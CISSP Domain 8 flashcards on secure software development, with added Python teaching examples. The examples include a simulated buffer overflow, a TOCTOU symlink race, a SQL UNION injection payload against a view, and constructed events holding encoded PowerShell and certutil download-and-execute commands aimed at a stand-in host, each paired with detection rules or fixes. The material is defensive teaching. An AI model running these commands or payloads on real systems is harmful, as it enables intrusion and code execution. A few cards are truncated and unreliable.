Domain 8: Software Development Security Flashcards

1
Q

Acceptance

A

A formal, structured handover of the finished software system to the customer organization; typically involves test, analysis, and assessment activities.

2
Q

Accreditation (also Security Accreditation)

A

Formal declaration by a designated accrediting authority (DAA) that an information system is approved to operate at an acceptable level of risk, based on the implementation of an approved set of technical, managerial, and procedural safeguards.

3
Q

ACID Test

A

Data integrity provided by enforcing the atomicity, consistency, isolation, and durability properties of transactions: each transaction completes entirely or not at all, leaves the database in a valid state, does not interfere with concurrently running transactions, and, once committed, survives a crash or power loss.

A.c.i.d tests integrity

4
Q

Advanced Persistent Threats (APTs)

A

An agent or organization of agents that plans, organizes, and carries out a highly sophisticated attack against a target person, organization, or industry over a period of months or possibly even years (thus “persistent”). APTs usually have a strategic goal in mind, which requires many steps in a concerted attack plan to achieve. The term “APT” may refer to the organization conducting the attack, to specific steps in such an attack as observed by a target, or to the entire attack sequence. An APT usually involves a phased set of activities, each of which may use dozens of different attack vectors in sequence or in tandem.

5
Q

Aggregation

A

The ability to combine nonsensitive data from separate sources to create sensitive information.

6
Q

Blocked and Allowed Lists (software, identities, addresses)

A

Use of lists of blocked or allowed identities—whether users, URLs, URIs, web addresses, IP addresses, geographic regions, hardware addresses, files, or programs—as a means of controlling (prohibiting or permitting) their access, use, or attempts to load and execute. These systems also alert designated IT security personnel if the attempt involves a resource not on a pre-approved list. Stand-alone security tools and integrated systems that provide these capabilities are now starting to incorporate anti-malware processes as part of their offerings; similarly, anti-malware products have begun to incorporate these blocked/allowed list management and use capabilities. In this course, the term “blocked list” replaces “blacklist” and the term “allowed list” replaces “whitelist.”

7
Q

Botnets

A

A network of automated systems or processes (robots, or for short, bots) performing a specific function together, usually malicious. Botnets have greatly magnified the power and speed of malicious operations because they all work together toward achieving a malicious goal, and they have allowed for tuning and directing of operations in a way that was not possible with malicious programs in the past.

8
Q

Bots

A

An emerging and special class of mobile code. These employ limited machine learning capabilities to assist with user requests for help or assistance, automation of or assistance with workflows, data input quality validation, and other similar tasks.

9
Q

Buffer Overflow

A

A source code vulnerability in which a program writes (or reads) beyond the bounds of the memory allocated for a buffer. It is typically triggered by supplying input larger than the input buffer receiving it.

User input is not validated for size, so it overflows the data structure and overwrites adjacent memory, which can let an attacker alter control data or inject malicious commands.
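Added illustration, not code from the original page: it models in Python the memory layout that makes a C-style overflow dangerous (a fixed-size buffer sitting directly before a privilege flag) and contrasts an unchecked copy with a length-checked one. The 8-byte buffer, the adjacent flag and the frame layout are assumptions made for the example; a real process stack is not a bytearray, but the mechanism of an overlong input overwriting the neighbouring variable is the same.

```python
BUF_SIZE = 8                      # assumed buffer size for the example
FLAG_OFFSET = BUF_SIZE            # the privilege flag sits right after the buffer

def fresh_frame():
    """Simulated stack frame: 8-byte name buffer followed by a 1-byte is_admin flag.
    (Constructed model of adjacent memory, not a real process stack.)"""
    return bytearray(BUF_SIZE + 1)      # all zero: flag = 0 = not admin

def unsafe_copy(frame, data):
    """Copies like an unchecked strcpy/loop: every byte of `data` is written,
    so indexes beyond BUF_SIZE-1 land in whatever follows the buffer."""
    for i, b in enumerate(data):
        frame[i] = b                    # in C this keeps going past the frame too;
    return frame                        # the bytearray merely stops at its own end

def safe_copy(frame, data):
    """Length-checked copy. Returns True if the data fit, False if it was rejected.
    (A NUL-terminated C string would need len(data) < BUF_SIZE to leave room for the NUL.)"""
    if len(data) > BUF_SIZE:
        return False
    frame[:len(data)] = data
    return True

def is_admin(frame):
    """Reads the flag the way privileged code would, trusting whatever is in memory."""
    return frame[FLAG_OFFSET] == 1
```

Feeding eight filler bytes followed by 0x01 through unsafe_copy flips the flag without ever touching code that sets it; safe_copy refuses the same input because the check happens before any byte is written.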

10
Q

Bypass Attack

A

Users may attempt to bypass controls at the front end of the database application to access information.

11
Q

Certification

A

The comprehensive technical security analysis of the system to ensure that it meets all applicable security requirements.

12
Q

Citizen Programmers

A

Members of the organization who codify work-related knowledge, insights, and ideas into varying degrees of reusable software-like forms, often using extensibility features found in most commercial software apps. The ad hoc nature of these pieces of functionality is extremely difficult to manage, control, verify, or assess. In almost all cases, these are beyond the reach and visibility of the organization’s software quality, configuration management, or security assessment processes. Such “citizen programming” is often done with little regard to security requirements and can pose a significant risk to some organizations.

13
Q

Code Protection or Logic Hiding

A

Prevents one software unit from reading or altering the source, intermediate, or executable code of another software unit.

14
Q

Code Reuse

A

When programmers reuse, rather than reinvent, units of software (procedures or objects) that have already been demonstrated to be correct, complete, safe, and secure.

15
Q

Commercial Off-the-Shelf (COTS)

A

Software elements, usually applications, that are provided as finished products not intended for alteration by the end user. Most COTS applications are available as host-based, endpoint-based, or platform-based services, and support user extensibility by means of non-programming tools, scripts, macros, and configuration parameters. COTS can also include firmware and hardware elements.

16
Q

Common Object Request Broker Architecture (CORBA)

A

A set of standards that addresses the need for interoperability between hardware and software products residing on different machines across a network. CORBA provides object location and use across a network: it is an international standard for distributed computing that enables code operating on one computer to locate and invoke resources located elsewhere on the network.

17
Q

Configuration Control (CC)

A

Process of controlling modifications to hardware, firmware, software, and documentation to protect the information system against improper modifications prior to, during, and after system implementation.

18
Q

Configuration Management (CM)

A

A collection of activities focused on establishing and maintaining the integrity of information technology products and information systems, through control of processes for initializing, changing, and monitoring the configurations of those products and systems throughout the system development life cycle.

19
Q

Continuous Integration and Continuous Delivery (CI/CD)

A

Workflow automation processes and tools that attempt to reduce, if not eliminate, the need for manual communication and coordination between the steps of a software development process.

20
Q

Covert Channel or Covert Path

A

A communications pathway between two or more processes that transfers information in ways that violate some security policy or requirement. These can be created deliberately (wittingly) by the process designer(s), or unwittingly by the hostile process exploiting hitherto unrecognized exposures of information, resources, or other characteristics by the target system.

21
Q

Data Contamination

A

Attackers can attempt to use malformed inputs—at the field, record, transaction, or file level—to disrupt the proper functioning of the system.

22
Q

Data Lake

A

A data warehouse incorporating multiple types or streams of unstructured or semi-structured data.

23
Q

Data Mining

A

An analysis and decision-making technique that relies on extracting deeper meanings from many different instances and types of data; often applied to data warehouse content.

Mnemonic: mine the gathered data to make decisions.

24
Q

Data Modeling

A

A design process that identifies all data elements the system will need to input, create, store, modify, output, and destroy during its operational use. Arguably, data modeling should be one of the first steps in systems analysis and design, regardless of whether procedural or OOP approaches will be used to implement it.

25
Q

Data Protection or Data Hiding

A

Restricts or prevents one software unit from reading or altering the private data of another software unit.

26
Q

Data Type Enforcement

A

How well (or how poorly) a language protects the programmer from trying to perform operations on dissimilar types of data, or in ways that would lead to erroneous results.

27
Q

Data Warehouse

A

A collection of data sources such as separate internal databases to provide a broader base of information for analysis, trending, and reference. May also involve databases from outside of the organization, either by importing a copy or by reference.

28
Q

Database Management System (DBMS)

A

A suite of application programs that typically manage databases and their environments. The heart of the DBMS is the database engine, a core application that performs and manages the basic functions of create, read, update, and delete (CRUD) of data to and from the database, while also making data available for display or export to users, endpoints, and other systems. The DBMS provides the structure for the data and some type of language and architecture for accessing and manipulating the data. The main objective is to store data and allow users to interact with it, but in a secure way from a confidentiality, integrity, and availability perspective.

29
Q

Database Model

A

The underlying software design concepts that a DBMS implements; it identifies the specific organization, structure, and architecture that the DBMS can provide to users as they build specific databases to meet business needs.

30
Q

Data-Centric Threat Modeling

A

A methodology and framework for focusing on the authorized movement, locations, execution, input, and output of data within, from, and into a system. These correspond with the security concepts of protecting data in transit, at rest (or in storage), and in use, and it provides a focus for carrying out the security decisions already made as the organization classifies and categorizes its data.

31
Q

Defensive Programming

A

The style of program design and coding that translates the business logic about acceptable and harmful input into code, which allows processing of acceptable inputs, but safely blocks attempts to input (or inject) harmful inputs. The lack of adequate defensive programming measures can result in an arbitrary code execution, a misdirection of the program to other resources or locations, or otherwise reveal more information useful to an attacker.

32
Q

DevOps

A

A systems development approach based on lean and agile principles in which business owners and the development, operations, and quality assurance departments collaborate to deliver software in a continuous manner that enables the business to more quickly react to market opportunities and reduce the time to include customer feedback into products that need to be developed.

33
Q

DevSecOps

A

Provides for a merger of phased review (as in the waterfall SDLC) with the DevOps method, to incorporate the needs for security, safety, resilience, or other emerging properties in the final system, at each turn of the cycle of development.

34
Q

Dynamic Application Security Testing (DAST)

A

Tools that execute the software unit, application, or system under test in ways that attempt to drive it to reveal a potentially exploitable vulnerability.

35
Q

Emerging Properties

A

An alternate and perhaps more powerful way of looking at systems-level behavior characteristics such as safety and security. This perspective also helps provide a more testable, measurable answer to questions such as “How secure is our system?”

36
Q

Encapsulation

A

Enforcement of data hiding and code hiding during all phases of software development and operational use. Bundling together data and methods is the process of encapsulation; its opposite process may be called unpacking or revealing. Also used to refer to taking any set of data and packaging it or hiding it in another data structure, as is common in network protocols and encryption.

37
Q

Executable Code, Object Code

A

The binary representation of the machine language instruction set that the CPU and other hardware of the target computer directly execute.

38
Q

Extensible Markup Language (XML)

A

A markup language for storing and transporting structured data in networked environments. It is a sibling of HTML rather than an extension of it (both descend from SGML). XML is frequently used to interface web pages at the front end of a system (as they are displayed and used on client endpoint devices) with databases on back-end servers, and XML content is often embedded in, or exchanged by, the HTML files that make up the elements of web pages.

39
Q

Functional Requirements

A

Describes a finite task or process the system must perform. These are often directly traceable to specific elements in the final system’s design and construction; formal configuration item audits should, for example, be able to identify a given unit of software with the specific functional requirements that dictated it be written and included into the product build.

40
Q

Hierarchical Database Model

A

Database model in which data elements and records are arranged in parent-child structures such as trees.

41
Q

Independent Verification and Validation (IV&V)

A

A comprehensive review, analysis, and test (software or hardware, or both) performed by an objective third party to confirm (i.e., verify) that the requirements are correctly defined, and to confirm (i.e., validate) that the system correctly implements the required functionality and security requirements.

42
Q

Inheritance

A

Provides mechanisms by which objects that are members of a class (a higher- level grouping of like objects) can make use of specific characteristics of the class. Files in a read-only folder, for example, generally will also inherit the folder’s read-only attribute.

43
Q

Interactive Application Security Testing (IAST)

A

Testing that combines or integrates SAST and DAST to improve testing and provide behavioral analysis capabilities to pinpoint the source of vulnerabilities.

44
Q

Integrated Development Environments (IDEs)

A

A set of software applications, their control procedures, supporting databases, libraries, and tool sets that provide a programmer or a team of programmers what they need to specify designs; translate designs into source code; and then compile, test, and integrate that code into a finished software product. Many IDEs support multiple programming languages and facilitate their use on the same project.

45
Q

Integrated Product Team (IPT)

A

A team of stakeholders and individuals who have various skills and work together to achieve a defined process or product.

46
Q

Intermediate Code

A

Expressing a program’s required function in a form that is somewhere between human-readable source code and binary sets of values that can be loaded into memory and executed by a CPU. The most common use of intermediate code is to provide machine independence or portability for a program, such as Java does.

47
Q

Knowledge Discovery in Database (KDD)

A

A mathematical, statistical, and visualization method of identifying valid and useful patterns in data.

48
Q

Knowledge Management

A

The efficient and effective management of information and associated resources in an enterprise to drive business intelligence and decision-making. It may include workflow management, business process modeling, document management, databases and information systems, and knowledge-based systems.

49
Q

Level of Abstraction

A

How closely the description (in source code, design documents, or any other form) represents, one-to-one, the details of the underlying object, system, or component. Lower-level abstractions generally have far more fine-grained detail than higher-level ones.

50
Q

Living Off the Land Nonmalware-Based Ransom Attack

A

An attack in which illicit access to a system is used to misuse the system’s own legitimate capabilities (administrative utilities, scripting engines, scheduled tasks, and similar built-in facilities) in pursuit of the attacker’s agenda. Because no malware is introduced, signature-based anti-malware defenses will not detect or prevent it; detection has to rely on behavioral signals, such as built-in tools being invoked in ways their normal users never invoke them.
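Added example, not from the original page: a small behavioral triage over constructed process-creation events, the kind of check a detection engineer writes when anti-malware signatures have nothing to match. The events are invented (hostnames, commands, the 198.51.100.7 address), and every rule is this example's own assumption about what abuse of a built-in tool looks like, not an authoritative list.

```python
import base64
import re

# Constructed process-creation events, loosely shaped like EDR/Sysmon fields.
# Not real telemetry. The first one carries a base64/UTF-16LE encoded command,
# the form `powershell -enc` expects.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
    .encode("utf-16-le")).decode()
EVENTS = [
    {"host": "ws01", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + _ENCODED},
    {"host": "ws02", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/x.txt C:\\Users\\Public\\x.txt"},
    {"host": "ws03", "parent": "services.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\ops\\backup.ps1"},          # benign admin job
    {"host": "ws04", "parent": "cmd.exe", "image": "wmic.exe",
     "cmdline": "wmic process call create \"cmd /c whoami > C:\\Users\\Public\\w.txt\""},
]

# Heuristics (assumptions of this example; tune to the environment).
RULES = [
    ("encoded PowerShell", re.compile(r"powershell.*\s-(encodedcommand|enc|e)\s", re.I)),
    ("certutil used as downloader", re.compile(r"certutil.*-urlcache", re.I)),
    ("wmic process creation", re.compile(r"wmic.*process\s+call\s+create", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe"}

def decode_encoded_command(cmdline):
    """Recover the plaintext of a -enc payload (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:encodedcommand|enc|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(events):
    """Return [(host, [reasons...])] for every event that trips at least one check."""
    hits = []
    for ev in events:
        reasons = [name for name, rx in RULES if rx.search(ev["cmdline"])]
        # Parent/child relationship: an Office document launching a script host.
        if ev["parent"].lower() in OFFICE_PARENTS and ev["image"].lower() in SCRIPT_HOSTS:
            reasons.append("script host spawned by Office")
        # Look inside the encoding instead of trusting the opaque blob.
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded and re.search(r"downloadstring|invoke-expression|\biex\b", decoded, re.I):
            reasons.append("decoded payload downloads and executes code")
        if reasons:
            hits.append((ev["host"], reasons))
    return hits
```

The benign backup job on ws03 uses the same binary as the ws01 event and passes, which is the point: the binary is not the signal, the parent process, the flags and the decoded content are.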

51
Q

Logic Bombs

A

Malware inserted into a program that will activate and perform functions that suit an attacker’s needs at some later date or when certain conditions are met.

52
Q

Malformed Input Attack

A

Many of the common source code errors in software can lead to that software failing to correctly handle input data, singly or in combination, that exceeds logical range checks, is contradictory or inconsistent, or is unauthorized. This can result in an arbitrary code execution, a misdirection of the program to other resources or locations, or otherwise reveal additional information useful to an attacker.
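Added example serving this card, the Defensive Programming card above and the Input Validation card at the end of the list; it is not code from the original page. It validates one parsed order record at the field level (type, syntax, authorization, range) and then at the record level (fields that are individually fine but contradict each other), returning every reason for rejection. The catalogue, the quantity limit and the identifier format are assumptions made for the example.

```python
import math
import re

ALLOWED_ITEMS = {"SKU-100", "SKU-200", "SKU-300"}   # constructed catalogue (assumption)
MAX_QTY = 100                                        # assumed business limit
ID_RE = re.compile(r"^SKU-\d{3}$")                   # allow-list syntax for identifiers

def _is_number(v):
    """int or float, excluding bool, NaN and infinities."""
    return isinstance(v, (int, float)) and not isinstance(v, bool) and math.isfinite(v)

def validate_order(record):
    """Return a list of rejection reasons for one parsed order record;
    an empty list means the record may proceed to processing."""
    errors = []
    item, qty = record.get("item"), record.get("qty")
    price, total = record.get("unit_price"), record.get("total")

    # Field level: syntax and type first, so nothing else ever sees a malformed value.
    if not isinstance(item, str) or not ID_RE.match(item):
        errors.append("item: malformed identifier")
    elif item not in ALLOWED_ITEMS:
        errors.append("item: not an authorized product")     # well-formed but unauthorized

    if not isinstance(qty, int) or isinstance(qty, bool):
        errors.append("qty: must be an integer")
    elif not 1 <= qty <= MAX_QTY:
        errors.append("qty: outside logical range 1..%d" % MAX_QTY)

    for name, value in (("unit_price", price), ("total", total)):
        if not _is_number(value) or value < 0:
            errors.append("%s: must be a non-negative finite number" % name)

    # Record level: individually valid fields can still contradict each other.
    if not errors and abs(qty * price - total) > 0.005:
        errors.append("total: inconsistent with qty * unit_price")
    return errors
```

Checking syntax with an allow-list pattern before the authorization lookup means an injection-shaped identifier such as SKU-1' OR 1=1 never reaches the code that would query a catalogue with it.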

53
Q

Malware

A

A program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim’s data, applications, or operating system or of otherwise annoying or disrupting the victim.

54
Q

Markup Languages

A

Nonprogramming languages used to express formatting or arrangement of data on a page or screen. Markup languages are extensible, which allows users to define other operations to be performed. These extend the language toward a programming language, such as the way that JavaScript embedded in HTML adds executable behavior to a page.

55
Q

Memory or Object Reuse

A

All systems must allocate memory or other resources as objects to requesting processes, which involves one process reusing such resources after the first using process has finished with them. Any data remaining in the object when it is reused is a potential security violation (i.e., a data remanence issue).

56
Q

Metadata

A

Information that describes the format or meaning of other data, which can be used to provide a systematic method for describing resources and improving the retrieval of information.

57
Q

Mobile Code (Executable Content)

A

A file or a set of files sent by one system to one or more other target or client systems, which, when opened by software already installed on that client, will either control the execution of systems and applications software on that client or be directly executed by that client’s CPU.

58
Q

Modified Prototype Model (MPM)

A

An approach to designing and building a system that starts by building a simplified version of the entire application; this is released for review, with the feedback from the stakeholders used to improve the design of a second, much better version. This is repeated until the owner and stakeholders are satisfied with the final product.

59
Q

Network Database Model

A

Database model in which data elements and records are arranged in arbitrary linked fashion, such as lists, clusters, or other network forms.

60
Q

Nonfunctional Requirements

A

Identifies broad characteristics of the system as a whole. These usually do not align with a clearly identified subset of systems elements. Typically, many safety, security, privacy, and resiliency needs have been deemed nonfunctional by their systems’ analysts and engineers, and, as such, configuration audits cannot identify whether any given software unit contributes to such nonfunctional requirements, or indeed if any of them do.

61
Q

Object

A

An encapsulation of a set of data and the methods that can be used to manipulate that data.

62
Q

Object-Oriented (OO) Database Model

A

A database model that uses object-oriented programming concepts of classes, instances, and objects to organize, structure, and store both data and methods. Schemas define the structure of the data (in terms of tables, records, and attributes or fields); views establish specific selections of tables, rows, and columns to meet user or security needs.

63
Q

Object-Oriented Programming (OOP)

A

Defines an object to be a set of software that offers one or more methods, internal to the object, that software external to that object can request be performed. Each method may require specific inputs and resources and may produce a specified set of outputs.

64
Q

Open-Source Software

A

Software whose source code and other design information is made publicly available for inspection, testing, assessment, and use. In many cases, open-source licenses allow modification and refactoring. While many commercial software products protect their source code as proprietary, others include, or are built on, licensed and supported reuse of open-source software.

65
Q

Polyinstantiation

A

Creates a new instance (or version copy) of a data item, with the same identifier or key, allowing for each process to have its own version of that data. Useful for enforcing and protecting different security levels for a shared resource.
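Added example, not from the original page: a multilevel store keyed on (key, level) so that the same logical key can exist once per classification. A low-clearance writer can insert its own version of a key without a key collision revealing that a higher-level version exists, and each reader sees only the most sensitive version it is cleared for. The levels, keys and payloads are constructed sample data.

```python
import sqlite3

LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2}   # assumed lattice

def make_store():
    conn = sqlite3.connect(":memory:")
    # The same logical key may exist once per classification level: that is the
    # polyinstantiation. A PRIMARY KEY on `key` alone would make the low-level
    # writer's INSERT fail, and that failure would confirm a secret row exists.
    conn.execute("""CREATE TABLE cargo (
        key TEXT NOT NULL, level INTEGER NOT NULL, payload TEXT NOT NULL,
        PRIMARY KEY (key, level))""")
    return conn

def write(conn, key, level, payload):
    """Store this subject's version of `key` at its own level; never touches other levels."""
    conn.execute("INSERT OR REPLACE INTO cargo VALUES (?, ?, ?)", (key, LEVELS[level], payload))
    conn.commit()

def read(conn, key, clearance):
    """Return the most sensitive version of `key` the reader is cleared for, or None."""
    row = conn.execute(
        "SELECT payload FROM cargo WHERE key = ? AND level <= ? ORDER BY level DESC LIMIT 1",
        (key, LEVELS[clearance])).fetchone()
    return row[0] if row else None
```

The cover story at the unclassified level and the real entry at the secret level coexist under one key; which one a caller gets is decided by clearance, not by which was written last.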

66
Q

Polymorphism

A

Allowing an object to “take many forms”: objects of different classes can respond to the same method call with behavior appropriate to their own class. Because callers depend only on the shared interface, changes to an object’s implementation do not have to ripple out into every application program that uses that object.

67
Q

Procedural Programming

A

Emphasizes the logical sequence or flow of steps to be performed. A “procedure” is a set of software that performs a particular function, requires specific input data (and possibly other resources), and produces a specific set of outputs. Outputs may include error signals, when appropriate. Procedures can invoke (“call”) other procedures.

68
Q

Query Attack

A

Use of query tools to access data not normally allowed by the trusted front end, including the views controlled by the query application. Malformed queries using SQL to bypass security controls may be possible as well. There are many other examples of where improper or incomplete checks on queries

69
Q

Ransom Attack

A

Any form of attack that threatens the destruction, denial, or unauthorized public release or remarketing of private information assets. It usually involves encrypting these assets and withholding the decryption key until the ransom is paid by the victim.

70
Q

Ransomware

A

Malware used for the purpose of facilitating a ransom attack.

71
Q

Rapid Application Development (RAD)

A

A development methodology that creates an application more quickly by employing techniques such as the use of fewer formal methodologies and reuse of software components.

72
Q

Refactoring

A

A partial or complete rewrite of a set of software to perform the same functions, but in a more straightforward, more efficient, or more maintainable form.

73
Q

Regression Testing

A

Testing of a system to ascertain whether recently approved modifications have changed its performance of other approved functions or has introduced other unauthorized behaviors.

74
Q

Relational Database Model

A

Database model in which data elements and records are arranged in tables, and tables are related (linked) to each other to implement the business logic needed to use data records of different structures or types together in the same activity.

75
Q

Representational State Transfer (REST)

A

A software architectural style for synchronizing the activities of two (or more) applications running on different systems on a network. REST facilitates these processes exchanging state information, usually via HTTP or HTTPS.

76
Q

Runtime Application Self-Protection (RASP)

A

Security agents (small code units) built into an application or its runtime by the developer that can detect a given set of attacks or security violations from inside the running process; upon such detection, the RASP agents can block the offending request, cause the application to terminate, or take other protective actions.

77
Q

Sandbox

A

A testing environment that is logically, physically, or virtually isolated from other environments, and in which applications or systems can be evaluated. Sandboxes can be used as part of development, integration, or acceptance testing to not interact with the production environments, as part of malware screening, or as part of a honeynet.

78
Q

Scanners (Anti-malware)

A

Software that examines a suspected file or set of files for the presence of malware, by signature analysis, activity monitors, heuristics, and machine learning techniques or change analysis.

79
Q

Secure Coding Guidelines and Standards

A

Best practices identified by a variety of software and security professionals that, when used correctly, can dramatically reduce the number of exploitable vulnerabilities introduced during development that remain in the operationally deployed system.

80
Q

Security Assessment

A

Testing, inspection, and analysis to determine the degree to which a system meets or exceeds the required security posture. This may assess whether an as-built system meets the requirements in its specifications, or whether an in-use system meets the current perception of the real-world security threats the system may be facing.

81
Q

Software (Quality) Assurance

A

A variety of formal and informal processes that attempt to determine whether a software application or system meets all its intended functions, does not perform unwanted functions, is free from known security vulnerabilities, and is free from insertion of other errors in its design, code, form, function, and data.

82
Q

Software Capability Maturity Modeling (SW-CMM) and Assessment

A

A management process to foster the ongoing and continuous improvement of an organization’s processes and workflows for developing, maintaining, and using software.

83
Q

Software Development Life Cycle (SDLC)

A

A framework and a systematic process with associated tasks that are performed in a series of steps for building, deploying, and supporting software applications. The life cycle begins with planning and requirements gathering and ends with decommissioning and sunsetting the software. There are many different SDLCs—such as agile, DevSecOps, and rapid prototyping— offering different approaches to defining and managing the software life cycle.

84
Q

Software Libraries

A

A repository of prewritten code, classes, procedures, scripts, and other programming elements. These may be provided by systems or applications vendors, from trustworthy third-party developers, developed in-house by the organization’s programmers, or available from various open-source sites.

85
Q

Source Code

A

Program statements written in human-readable form using a formal programming language’s rules for syntax and semantics.

86
Q

Spiral Method

A

Improved waterfall development process, which provides for a cycle of Plan, Do, Check, and Act (PDCA) substages at each phase of the SDLC.

87
Q

Spyware and Adware

A

Software that performs a variety of monitoring and data gathering functions. Also known as potentially unwanted programs or applications (PUPs or PUAs), these may be used in monitoring employee activities or their use of systems resources (spyware); adware facilitates advertising efforts. Both may be legitimate and authorized by systems owners to be in use or may be unwanted intruders in these systems.

88
Q

Static Application Security Testing (SAST)

A

Also known as static source code analysis, these are tools that examine the source code for a variety of errors such as data type errors, loop and structure bounds violations, and unreachable code. Since SAST tools do not attempt to execute or simulate the execution of the code being analyzed, it is a bit of a misnomer to call them “testing” tools.

89
Q

Strong Data Typing

A

A feature of a programming language that prevents data type mismatch errors (such as trying to add amounts of money to dates or times). Strongly typed languages will generate errors at compile time, forcing the programmer to correct a type mismatch or include additional code that performs the correct data type conversion at runtime.

90
Q

Threat Surface

A

The total set of penetrations of a boundary or perimeter that surrounds or contains systems elements.

91
Q

Time of Check versus Time of Use (TOCTOU) Attacks

A

Takes advantage of the time delay between a security check (such as authentication or authorization) being performed and actual use of the asset.
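Added example, not from the original page: a filesystem check-then-open race, with a hook standing in for the attacker's move between the check and the use, beside the hardened form that opens once (refusing symlinks) and decides on the descriptor it actually holds. The scenario (report.txt swapped for a symlink to secret.txt in a temporary directory) is constructed, and the code assumes a POSIX system where os.O_NOFOLLOW and os.symlink are available.

```python
import os
import stat
import tempfile

def vulnerable_read(path, between_check_and_use=lambda: None):
    """Check-then-open: the file can change between the two steps."""
    if os.path.islink(path):                 # time of check
        return None
    between_check_and_use()                  # the window an attacker races into
    with open(path, "rb") as f:              # time of use: open() follows symlinks
        return f.read()

def safe_read(path):
    """Open once with no symlink following, then decide using the open descriptor."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # POSIX flag (assumed available)
    except OSError:                          # ELOOP on a symlink, ENOENT, EACCES, ...
        return None
    try:
        st = os.fstat(fd)                    # properties of what was actually opened
        if not stat.S_ISREG(st.st_mode):
            return None
        return os.read(fd, st.st_size)       # single read is enough for this small file
    finally:
        os.close(fd)

def demo():
    """Constructed scenario: report.txt passes the check, then becomes a link to secret.txt.
    Returns (what the vulnerable reader leaked, what the safe reader returned on the
    swapped path, what the safe reader returns on an honest regular file)."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")
        report = os.path.join(d, "report.txt")
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")
        with open(report, "wb") as f:
            f.write(b"public report")

        def attacker_swaps():
            os.remove(report)
            os.symlink(secret, report)

        leaked = vulnerable_read(report, attacker_swaps)
        blocked = safe_read(report)          # report is the symlink by now
        honest = safe_read(secret)
        return leaked, blocked, honest
```

O_NOFOLLOW only covers the final path component; if the directories above it are writable by the attacker, the hardened version should also open the directory and use openat-style calls relative to that descriptor.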

92
Q

Trapdoor or Backdoor

A

A hidden mechanism that bypasses access control measures. It is an entry point into an architecture or system that is inserted in software by developers, during the program’s development, to provide a method of gaining access into the program for modification and support reasons. It can also be inserted by an attacker, bypassing access control measures designed to prevent unauthorized software changes.

93
Q

Trojans

A

Malware that inserts backdoors or trapdoors into other programs or systems. The malware may or may not be disguised as some useful or entertaining application.

94
Q

Trusted Computing Base (TCB)

A

The collection of all the hardware, software, and firmware components within an architecture that is specifically responsible for security and the isolation of objects. TCB is a term usually associated with security kernels and reference monitors.

95
Q

View-Based Access Controls

A

An access control process that allows the database to be logically divided into pieces (individual records, fields, or groups of items) that allow certain sensitive data to be hidden from users that are not authorized to see it or manipulate it. Administrators can set up a view for each type of user and then each user can only access the view assigned to them. Some database views will allow the restrictions to be granular—for example, of both rows and columns—while others allow for views that can write and update data as well as the capability to only read.
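Added example serving this card and the Query Attack card above; it is not code from the original page. A view exposes only name and department and acts as the trusted front end; a lookup that builds its SQL by string formatting lets a UNION payload pull the hidden salary column from the base table straight through the view, while the parameterized lookup treats the same payload as a department name that matches nothing. Table contents are constructed sample data.

```python
import sqlite3

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (name TEXT, dept TEXT, salary INTEGER)")
    conn.executemany("INSERT INTO employees VALUES (?, ?, ?)",
                     [("ann", "eng", 150000), ("raj", "eng", 120000), ("mei", "hr", 90000)])
    # The view is the access-control boundary: callers are meant to see only
    # name and dept, never salary.
    conn.execute("CREATE VIEW directory AS SELECT name, dept FROM employees")
    return conn

def lookup_vulnerable(conn, dept):
    """String-built query: the caller's text becomes part of the SQL."""
    sql = "SELECT name, dept FROM directory WHERE dept = '%s'" % dept
    return conn.execute(sql).fetchall()

def lookup_safe(conn, dept):
    """Parameterized query: the caller's text can only ever be a value."""
    return conn.execute("SELECT name, dept FROM directory WHERE dept = ?", (dept,)).fetchall()

# Constructed attack input. Through lookup_vulnerable it becomes
#   SELECT name, dept FROM directory WHERE dept = 'x'
#   UNION SELECT name, salary FROM employees --'
# and the second SELECT reads the base table the view was supposed to hide.
INJECTION = "x' UNION SELECT name, salary FROM employees --"
```

The view did its job in both cases; what differed is whether the application let the query text be rewritten. View-based controls restrict what the front end asks for, not what an attacker who can edit the SQL asks for.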

96
Q

Virus

A

A software program written with the intent and capability to copy and disperse itself without the knowledge and cooperation of the owner or user of the system. Researchers of malicious software disagree on a perfect definition of a virus; however, a common definition may be a program that modifies other programs to contain a possibly altered version of itself.

97
Q

Cycle (SDLC)

A

Traditional or classic software development life cycle model with clearly defined boundaries between each phase. There are many variations on this model, with phases such as concept or mission; needs identification; requirements definition; systems design; software and data systems coding; unit, subsystem, and systems testing; acceptance testing; and deployment to operational use. There are many other SDLCs as models and business processes, all different, which are not “waterfall” in concept or use.

98
Q

Worm

A

A software program written with the intent and capability to copy and disperse itself without the knowledge and cooperation of

99
Q

runtime environment

A

A system that allows the portable execution of code across different operating systems. This may include sandboxes, virtual machines, and containerization.

100
Q

compiler

A

A software development tool that converts higher-level language code into a machine language executable file designed for use on a specific operating system.

101
Q

decompiler

A

A specialized programming tool that may be able to reverse the compilation process. Decompilers attempt to take binary executables and convert them back into source code form. See disassembler.

102
Q

software library, Software libraries

A

A collection of reusable code for developers. These libraries perform a variety of functions, ranging from text manipulation to machine learning, and are a common way for developers to improve their efficiency.

103
Q

input validation

A

An aspect of defensive programming intended to ward off a wide range of input-focused attacks, such as buffer overflows and fuzzing. Checking, scanning, filtering, or sanitizing input received from users (especially over the internet) before processing the received input. See also input sanitization.

104
Q

limit check

A

A type of input validation, where the code checks to ensure that a number falls within an acceptable range.

105
Q

Capability Maturity Model (CMM)

A

A formal software development management concept that describes the process that organizations undertake as they move toward incorporating solid engineering principles into their software development processes. Aka software capability maturity model (SCMM, S-CMM).

106
Q

